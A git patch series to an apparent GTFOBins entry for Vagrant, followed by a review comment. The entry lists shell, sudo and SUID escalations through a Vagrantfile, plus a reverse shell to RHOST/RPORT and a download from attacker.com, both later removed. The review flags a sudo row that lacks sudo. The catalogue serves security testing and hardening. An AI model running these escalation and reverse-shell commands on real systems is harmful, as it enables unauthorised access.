From e05b154647c59987188e61454ff75b98786005c0 Mon Sep 17 00:00:00 2001
From: PPong <102512960+ham45X13y@users.noreply.github.com>
Date: Wed, 29 Mar 2023 18:34:57 +0200
Subject: [PATCH 1/2] Add vagrant.md
---
 _gtfobins/vagrant.md | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 _gtfobins/vagrant.md
diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
new file mode 100644
index 0000000..95de912
--- /dev/null
+++ b/_gtfobins/vagrant.md
@@ -0,0 +1,30 @@
+---
+description: |
+Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
+More Info at https://gtfobins.github.io/gtfobins/ruby/
+functions:
+ shell:
+ - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
+ -
+ sudo:
+ - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
+ reverse-shell:
+ - description: |
+ Run `nc -lvnp RPORT` on the attacker box.
+ Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
+ code: |
+ mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
+ file-write:
+ - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
+ file-read:
+ - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
+ library-load:
+ - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ file-download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
+---
+
From f121dff1cc50157a70e5a6bb1d0c2d75a09c1594 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Thu, 13 Apr 2023 08:34:09 +0200
Subject: [PATCH 2/2] Simplify vagrant
---
 _gtfobins/vagrant.md | 38 ++++++++++++++------------------------
 1 file changed, 14 insertions(+), 24 deletions(-)
diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
index 95de912..c297c81 100644
--- a/_gtfobins/vagrant.md
+++ b/_gtfobins/vagrant.md
@@ -1,30 +1,20 @@
 ---
-description: |
-Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
-More Info at https://gtfobins.github.io/gtfobins/ruby/
+description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
 functions:
 shell:
- - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
- -
+ - code: |
+ cd $(mktemp -d)
+ echo 'exec "/bin/sh"' > Vagrantfile
+ vagrant up
 sudo:
- - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
- reverse-shell:
- - description: |
- Run `nc -lvnp RPORT` on the attacker box.
- Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
- code: |
- mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
- file-write:
- - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
- file-read:
- - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
- library-load:
- - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
- file-download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
+ - code: |
+ cd $(mktemp -d)
+ echo 'exec "/bin/sh"' > Vagrantfile
+ vagrant up
+ suid:
+ - code: |
+ cd $(mktemp -d)
+ echo 'exec "/bin/sh -p"' > Vagrantfile
+ vagrant up
 ---
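Review bot: The new `sudo` row's body is a verbatim copy of the `shell` row — its last line is plain `vagrant up`, whereas the removed line it replaces ended in `sudo vagrant up`, so the row no longer matches its own label; the last line of that block should read `sudo vagrant up`. The three added `cd $(mktemp -d)` lines leave the command substitution unquoted; `cd "$(mktemp -d)"` is the usual form so a TMPDIR containing whitespace is not word-split. The rewritten description reads awkwardly ("This allows to execute" should be "This allows executing") and could name the mechanism the rows rely on, presumably that `vagrant up` evaluates the `Vagrantfile` in the current directory as Ruby, which the first commit's description stated and this one drops.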